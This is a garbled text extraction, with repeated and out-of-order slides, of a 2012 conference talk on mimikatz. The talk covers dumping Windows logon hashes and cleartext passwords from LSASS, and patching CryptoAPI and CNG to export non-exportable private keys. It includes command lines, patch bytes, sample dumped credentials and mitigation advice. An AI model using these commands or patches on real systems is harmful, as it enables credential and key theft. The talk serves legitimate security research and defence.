msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa what is it
mimikatz sekurlsa what is it
A module replacement for my previous favorite library
A local module that can read data from the SamSS Service (well known LSASS process)
What sekurlsa module can dump ndash MSV1_0 hashes
ndash TsPkg passwords
ndash Wdigest passwords
ndash LiveSSP passwords
ndash Kerberos passwords ()
ndash hellip
A module replacement for my previous favorite library
A local module that can read data from the SamSS Service (well known LSASS process)
What sekurlsa module can dump ndash MSV1_0 hashes
ndash TsPkg passwords
ndash Wdigest passwords
ndash LiveSSP passwords
ndash Kerberos passwords ()
ndash hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 5 5
mod_mimikatz_sekurlsa
mimikatz sekurlsa how LSA works ( level)
mimikatz sekurlsa how LSA works ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 6 6
LsaSS WinLogon
Authentication Packages msv1_0
tspkg
wdigest
livessp
kerberos
Authentication
msv1_0
kerberos
SAM
Challenge Response
userdomainpassword
PLAYSKOOL
mimikatz sekurlsa how LSA works ( level)
mimikatz sekurlsa how LSA works ( level)
Authentication packages
ndash take userrsquos credentials from the logon
ndash make their own stuff
ndash keep enough data in memory to compute responses of challenges (Single Sign On)
If we can get data and inject it in another session of LSASS we avoid authentication part
This is the principle of laquo Pass-the-hash raquo
ndash In fact of laquo Pass-the-x raquo
Authentication packages
ndash take userrsquos credentials from the logon
ndash make their own stuff
ndash keep enough data in memory to compute responses of challenges (Single Sign On)
If we can get data and inject it in another session of LSASS we avoid authentication part
This is the principle of laquo Pass-the-hash raquo
ndash In fact of laquo Pass-the-x raquo
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 7 7
PLAYSKOOL
mimikatz sekurlsa history of laquo pass-the- raquo 12
mimikatz sekurlsa history of laquo pass-the- raquo 12
Pass-the-hash ndash 1997 - Unix modified SAMBA client for Hashes usage Paul Ashton (EIGEN)
ndash 2000 - Private version of a Windows laquo LSA Logon Session Editor raquo Hernan Ochoa (CoreSecurity)
ndash 2007 - TechEd Microsoft Marc Murray (TrueSec) present msvctl and provide some downloads of it
ndash 2007 - laquo Pass the hash toolkit raquo published Hernan Ochoa (CoreSecurity)
ndash 2007 - mimikatz 01 includes pass the hash and is publicly available for x86 amp x64 versions of Windows (yeah by myself but in French so not famous ))
2007 was the year of pass the hash
Pass-the-ticket ndash 042011 - wce (pass the hash toolkit evolution) provides Kerberos ticket
support Hernan Ochoa (Ampliasecurity)
Pass-the-hash ndash 1997 - Unix modified SAMBA client for Hashes usage Paul Ashton (EIGEN)
ndash 2000 - Private version of a Windows laquo LSA Logon Session Editor raquo Hernan Ochoa (CoreSecurity)
ndash 2007 - TechEd Microsoft Marc Murray (TrueSec) present msvctl and provide some downloads of it
ndash 2007 - laquo Pass the hash toolkit raquo published Hernan Ochoa (CoreSecurity)
ndash 2007 - mimikatz 01 includes pass the hash and is publicly available for x86 amp x64 versions of Windows (yeah by myself but in French so not famous ))
2007 was the year of pass the hash
Pass-the-ticket ndash 042011 - wce (pass the hash toolkit evolution) provides Kerberos ticket
support Hernan Ochoa (Ampliasecurity)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 8 8
mimikatz sekurlsa history of laquo pass-the- raquo 22
mimikatz sekurlsa history of laquo pass-the- raquo 22
Pass-the-pass ndash 052011 ndash mimikatz 10 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3) bull httpbloggentilkiwicomsecuritepass-the-pass
ndash 052011 ndash return of mimikatz it dumps clear text passwords from WDigest provider (unlimited this time ))
bull httpbloggentilkiwicomsecuritere-pass-the-pass
ndash 052011 ndash Some organizations opened cases to Microsoft about ithellip
hellipLots of timehellip
ndash begin of 2012 - Lots of blogs (and Kevin Mitnick )) say few words about mimikatz
ndash 032012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extracthellip
bull httpseclistsorgpen-test2012Mar7
ndash 032012 ndash mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
bull httpbloggentilkiwicomsecuriterere-pass-the-pass
ndash 032012 ndash yeah once againhellip more curious but Kerberos keeps passwords in memory bull httpbloggentilkiwicomsecuritererere-pass-the-pass
ndash 082012 ndash sekurlsa module without injection at all (ultra safe) bull httpbloggentilkiwicomsecuritemimikatzsekurlsa-fait-son-apparition
Pass-the-pass ndash 052011 ndash mimikatz 10 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3) bull httpbloggentilkiwicomsecuritepass-the-pass
ndash 052011 ndash return of mimikatz it dumps clear text passwords from WDigest provider (unlimited this time ))
bull httpbloggentilkiwicomsecuritere-pass-the-pass
ndash 052011 ndash Some organizations opened cases to Microsoft about ithellip
hellipLots of timehellip
ndash begin of 2012 - Lots of blogs (and Kevin Mitnick )) say few words about mimikatz
ndash 032012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extracthellip
bull httpseclistsorgpen-test2012Mar7
ndash 032012 ndash mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
bull httpbloggentilkiwicomsecuriterere-pass-the-pass
ndash 032012 ndash yeah once againhellip more curious but Kerberos keeps passwords in memory bull httpbloggentilkiwicomsecuritererere-pass-the-pass
ndash 082012 ndash sekurlsa module without injection at all (ultra safe) bull httpbloggentilkiwicomsecuritemimikatzsekurlsa-fait-son-apparition
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 9 9
mimikatz sekurlsa tspkg mimikatz sekurlsa tspkg
because sometimes hash is not enoughhellip
because sometimes hash is not enoughhellip
